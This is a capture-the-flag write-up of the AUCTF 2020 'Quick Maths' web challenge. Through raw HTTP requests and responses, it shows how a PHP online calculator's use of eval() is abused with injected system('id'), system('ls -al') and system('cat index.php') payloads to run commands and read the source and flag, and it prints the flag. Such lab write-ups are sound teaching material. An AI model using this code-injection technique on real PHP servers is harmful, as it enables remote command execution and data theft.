Tags: web php eval
Rating:
# AUCTF 2020 – Quick Maths
* **Category:** web
* **Points:** 50
## Challenge
> http://challenges.auctf.com:30021
>
> two plus two is four minus three that's one quick maths
>
> Author: shinigami
## Solution
The website is an on-line calculator.
```
POST / HTTP/1.1
Host: challenges.auctf.com:30021
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://challenges.auctf.com:30021
Connection: close
Referer: http://challenges.auctf.com:30021/
Upgrade-Insecure-Requests: 1
statement=1%2B1
HTTP/1.1 200 OK
Date: Fri, 03 Apr 2020 19:22:19 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.0.33
Vary: Accept-Encoding
Content-Length: 332
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
</body>
<title>Calc Online</title>
<center><h1>Online Calculator</h1></center>
<form action="" method="post">
<center><h3>Input your expression</h3></center>
<center><input type="text" name="statement" /></center>
<center><input type="submit"/><center>
</form>
<div>
<h2>Result</h2>2</div>
</body>
</html>
```
You can easily trigger an error and discover that it uses PHP `eval()`.
```
POST / HTTP/1.1
Host: challenges.auctf.com:30021
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Origin: http://challenges.auctf.com:30021
Connection: close
Referer: http://challenges.auctf.com:30021/
Upgrade-Insecure-Requests: 1
statement={{}}
HTTP/1.1 200 OK
Date: Fri, 03 Apr 2020 19:23:17 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.0.33
Vary: Accept-Encoding
Content-Length: 440
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
</body>
<title>Calc Online</title>
<center><h1>Online Calculator</h1></center>
<form action="" method="post">
<center><h3>Input your expression</h3></center>
<center><input type="text" name="statement" /></center>
<center><input type="submit"/><center>
</form>
<div>
<h2>Result</h2>
Parse error: syntax error, unexpected '{' in /var/www/html/index.php(5) : eval()'d code on line 1
```
So you can use PHP `system()` function to execute commands.
```
POST / HTTP/1.1
Host: challenges.auctf.com:30021
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://challenges.auctf.com:30021
Connection: close
Referer: http://challenges.auctf.com:30021/
Upgrade-Insecure-Requests: 1
statement=system('id')
HTTP/1.1 200 OK
Date: Fri, 03 Apr 2020 19:23:53 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.0.33
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 438
<html>
</body>
<title>Calc Online</title>
<center><h1>Online Calculator</h1></center>
<form action="" method="post">
<center><h3>Input your expression</h3></center>
<center><input type="text" name="statement" /></center>
<center><input type="submit"/><center>
</form>
<div>
<h2>Result</h2>uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)</div>
</body>
</html>
```
You can list the directory.
```
POST / HTTP/1.1
Host: challenges.auctf.com:30021
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://challenges.auctf.com:30021
Connection: close
Referer: http://challenges.auctf.com:30021/
Upgrade-Insecure-Requests: 1
statement=system('ls -al')
HTTP/1.1 200 OK
Date: Fri, 03 Apr 2020 19:26:23 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.0.33
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 560
<html>
</body>
<title>Calc Online</title>
<center><h1>Online Calculator</h1></center>
<form action="" method="post">
<center><h3>Input your expression</h3></center>
<center><input type="text" name="statement" /></center>
<center><input type="submit"/><center>
</form>
<div>
<h2>Result</h2>total 16
drwxr-xr-x 1 www-data www-data 4096 Apr 3 19:24 .
drwxr-xr-x 1 root root 4096 Dec 29 2018 ..
-rwxr-xr-x 1 root root 560 Mar 31 19:34 index.php
-rwxr-xr-x 1 root root 560 Mar 31 19:34 index.php</div>
</body>
</html>
```
And print the `index.php` file to discover the flag.
```
POST / HTTP/1.1
Host: challenges.auctf.com:30021
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://challenges.auctf.com:30021
Connection: close
Referer: http://challenges.auctf.com:30021/
Upgrade-Insecure-Requests: 1
statement=system('cat index.php')
HTTP/1.1 200 OK
Date: Fri, 03 Apr 2020 19:27:06 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.0.33
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 898
<html>
</body>
<title>Calc Online</title>
<center><h1>Online Calculator</h1></center>
<form action="" method="post">
<center><h3>Input your expression</h3></center>
<center><input type="text" name="statement" /></center>
<center><input type="submit"/><center>
</form>
<div>
<h2>Result</h2>
<html>
</body>
<title>Calc Online</title>
<center><h1>Online Calculator</h1></center>
<form action="" method="post">
<center><h3>Input your expression</h3></center>
<center><input type="text" name="statement" /></center>
<center><input type="submit"/><center>
</form>
<div>
Result</h2>";
echo evaluate();
}
?>
</div>
</body>
</html>
</html></div>
</body>
</html>
```
The flag is the following.
```
auctf{p6p_1nj3c7i0n_iz_k3wl}
```